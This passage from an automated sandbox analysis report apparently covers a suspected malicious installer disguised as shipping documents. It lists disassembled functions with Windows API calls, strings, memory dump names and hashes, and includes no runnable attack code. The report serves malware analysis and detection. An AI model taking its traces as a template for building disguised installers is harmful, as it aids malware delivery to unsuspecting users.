ShowWindow.USER32(?,00000000), ref: 004050DD
GetDlgItem.USER32(?,000003FE), ref: 004050E8
ShowWindow.USER32(00000000), ref: 004050EF

Strings

, xrefs: 004050C7
M, xrefs: 00404CB8
N, xrefs: 00404D99

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 76a51ec3fa87313c88060479e11805ee9570431e44e9bc5a31b06844deabf825
Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
Opcode Fuzzy Hash: 76a51ec3fa87313c88060479e11805ee9570431e44e9bc5a31b06844deabf825
Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58

Function 00403358 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 335stringfilecomCOMMON

Download Yara Rule

APIs

#17.COMCTL32 ref: 00403377
SetErrorMode.KERNEL32(00008001), ref: 00403382
OleInitialize.OLE32(00000000), ref: 00403389

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033D9
CharNextW.USER32(00000000,00434000,00000020), ref: 00403400
GetTempPathW.KERNEL32(00000400,00436800,00000000,00000020), ref: 00403509
GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040351A
lstrcatW.KERNEL32(00436800,\Temp), ref: 00403526
GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040353A
lstrcatW.KERNEL32(00436800,Low), ref: 00403542
SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403553
SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040355B
DeleteFileW.KERNEL32(00436000), ref: 0040356F
OleUninitialize.OLE32(?), ref: 0040361F
ExitProcess.KERNEL32 ref: 0040363F
lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 0040364B
lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 00403657
CreateDirectoryW.KERNEL32(00436800,00000000), ref: 00403663
SetCurrentDirectoryW.KERNEL32(00436800), ref: 0040366A
DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C4
CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036D8
CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
ExitProcess.KERNEL32 ref: 004037BA

Strings

Error launching installer, xrefs: 004035D6
\Temp, xrefs: 00403520
TEMP, xrefs: 0040354E
~nsu.tmp, xrefs: 00403645
SeShutdownPrivilege, xrefs: 0040376D
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040336B
TMP, xrefs: 00403556
NSIS Error, xrefs: 004033B7
Low, xrefs: 0040353C

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-1875889550
Opcode ID: b8fba2d3f2b1c611e22a85b6af37489a6fd7a8924b7a7b1bf72e15cfe01e73cf
Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
Opcode Fuzzy Hash: b8fba2d3f2b1c611e22a85b6af37489a6fd7a8924b7a7b1bf72e15cfe01e73cf
Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

Function 00405770 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,00436800,75922EE0,00434000), ref: 00405799
lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,00436800,75922EE0,00434000), ref: 004057E1
lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,00436800,75922EE0,00434000), ref: 00405804
lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,00436800,75922EE0,00434000), ref: 0040580A
FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,00436800,75922EE0,00434000), ref: 0040581A
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
FindClose.KERNEL32(00000000), ref: 004058C9

Strings

\*.*, xrefs: 004057DB

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
Opcode Fuzzy Hash: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E

Function 388D7760 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$]q, xrefs: 388D7C19
$]q, xrefs: 388D7C0D
$]q, xrefs: 388D7CAC
$]q, xrefs: 388D7CCE
$]q, xrefs: 388D7881
$]q, xrefs: 388D7CB8
$]q, xrefs: 388D788D
$]q, xrefs: 388D7850
$]q, xrefs: 388D785C
$]q, xrefs: 388D7CC2

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-2843079600
Opcode ID: b997bf234076a64b452057b5b0fea10143e455e5d60a2cc0db19d0df343aaf38
Instruction ID: 915b19fc1febd248788bdd1a3e5e306a3dfe974d3af11392b32601685da0b5c1
Opcode Fuzzy Hash: b997bf234076a64b452057b5b0fea10143e455e5d60a2cc0db19d0df343aaf38
Instruction Fuzzy Hash: 80122B34A00219CFDB24EF69C990A9EB7F2BF88304F208969D409AB755DF349D46CF91

Function 0040653D Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44

Function 0040622B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00436800,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,00436800,?,75922EE0,00405790,?,00436800,75922EE0), ref: 00406236
FindClose.KERNEL32(00000000), ref: 00406242

Strings

WB, xrefs: 0040622C

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: WB
API String ID: 2295610775-2854515933
Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD

Function 004052D1 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405330
GetDlgItem.USER32(?,000003EE), ref: 0040533F
GetClientRect.USER32(?,?), ref: 0040537C
GetSystemMetrics.USER32(00000015), ref: 00405384
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
ShowWindow.USER32(?,00000008), ref: 00405420
GetDlgItem.USER32(?,000003EC), ref: 00405441
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
GetDlgItem.USER32(?,000003F8), ref: 0040534E

Part of subcall function 00404162: SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170

GetDlgItem.USER32(?,000003EC), ref: 00405493
CreateThread.KERNEL32(00000000,00000000,Function_00005265,00000000), ref: 004054A1
CloseHandle.KERNEL32(00000000), ref: 004054A8
ShowWindow.USER32(00000000), ref: 004054CC
ShowWindow.USER32(?,00000008), ref: 004054D1
ShowWindow.USER32(00000008), ref: 0040551B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
CreatePopupMenu.USER32 ref: 00405560
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
GetWindowRect.USER32(?,?), ref: 00405594
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
OpenClipboard.USER32(00000000), ref: 004055F5
EmptyClipboard.USER32 ref: 004055FB
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
GlobalLock.KERNEL32(00000000), ref: 00405611
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
GlobalUnlock.KERNEL32(00000000), ref: 00405645
SetClipboardData.USER32(0000000D,00000000), ref: 00405650
CloseClipboard.USER32 ref: 00405656

Strings

{, xrefs: 00405539

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 1a5139e6078aa1fdd5380d113510ef6b25ff983d9f8c9825e1a42f9c65a41b23
Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
Opcode Fuzzy Hash: 1a5139e6078aa1fdd5380d113510ef6b25ff983d9f8c9825e1a42f9c65a41b23
Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69

Function 00403C55 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
ShowWindow.USER32(?), ref: 00403CAE
DestroyWindow.USER32 ref: 00403CC2
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
GetDlgItem.USER32(?,?), ref: 00403CFF
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
IsWindowEnabled.USER32(00000000), ref: 00403D1A
GetDlgItem.USER32(?,00000001), ref: 00403DC8
GetDlgItem.USER32(?,00000002), ref: 00403DD2
SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3D
GetDlgItem.USER32(?,00000003), ref: 00403EE3
ShowWindow.USER32(00000000,?), ref: 00403F04
EnableWindow.USER32(?,?), ref: 00403F16
EnableWindow.USER32(?,?), ref: 00403F31
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F47
EnableMenuItem.USER32(00000000), ref: 00403F4E
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F66
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
ShowWindow.USER32(?,0000000A), ref: 004040EA

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 1926e66dbe86b771c32413573697ed931c6ac126e5224ec9b851fb9904e66452
Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
Opcode Fuzzy Hash: 1926e66dbe86b771c32413573697ed931c6ac126e5224ec9b851fb9904e66452
Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E

Function 004038B2 Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 216stringregistrylibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

lstrcatW.KERNEL32(00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800,75923420,00000000,00434000), ref: 00403933
lstrlenW.KERNEL32(00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800), ref: 004039B3
lstrcmpiW.KERNEL32(00427178,.exe,00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
GetFileAttributesW.KERNEL32(00427180), ref: 004039D1
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A1A

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

RegisterClassW.USER32(00428180), ref: 00403A57
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
ShowWindow.USER32(00000005,00000000), ref: 00403ADA
LoadLibraryW.KERNEL32(RichEd20), ref: 00403AEB
LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
RegisterClassW.USER32(00428180), ref: 00403B1C
DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 004038E6
RichEdit, xrefs: 00403B0D
.DEFAULT\Control Panel\International, xrefs: 0040391E
.exe, xrefs: 004039C0
RichEd20, xrefs: 00403AE6
RichEdit20W, xrefs: 00403AFE, 00403B04
RichEd32, xrefs: 00403AF1
_Nb, xrefs: 00403A36, 00403A9E

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 914957316-1115850852
Opcode ID: 8e4e2db869f3f3991819afcb55c59cc8f3ae99e000e4feef3646a4c772ef4b1b
Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
Opcode Fuzzy Hash: 8e4e2db869f3f3991819afcb55c59cc8f3ae99e000e4feef3646a4c772ef4b1b
Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D

Function 004042CA Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404368
GetDlgItem.USER32(?,000003E8), ref: 0040437C
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404399
GetSysColor.USER32(?), ref: 004043AA
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
lstrlenW.KERNEL32(?), ref: 004043CB
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
GetDlgItem.USER32(?,0000040A), ref: 00404446
SendMessageW.USER32(00000000), ref: 0040444D
GetDlgItem.USER32(?,000003E8), ref: 00404478
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
SetCursor.USER32(00000000), ref: 004044CC
ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E1
LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
SetCursor.USER32(00000000), ref: 004044F0
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040451F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531

Strings

N, xrefs: 00404466
AB@, xrefs: 004044D6
open, xrefs: 004044D9

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: AB@$N$open
API String ID: 3615053054-4108209771
Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9

Function 00405C06 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C16
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C3A
GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43

Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
wsprintfA.USER32 ref: 00405C7E
GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
GlobalFree.KERNEL32(00000000), ref: 00405D6F
CloseHandle.KERNEL32(00000000), ref: 00405D76

Part of subcall function 00405B54: GetFileAttributesW.KERNEL32(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A

Strings

peB, xrefs: 00405C55
p]B, xrefs: 00405C0B
NUL, xrefs: 00405C10
[Rename], xrefs: 00405CE8, 00405CFA
%ls=%ls, xrefs: 00405C74

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %ls=%ls$NUL$[Rename]$p]B$peB
API String ID: 1265525490-3322868524
Opcode ID: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
Opcode Fuzzy Hash: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
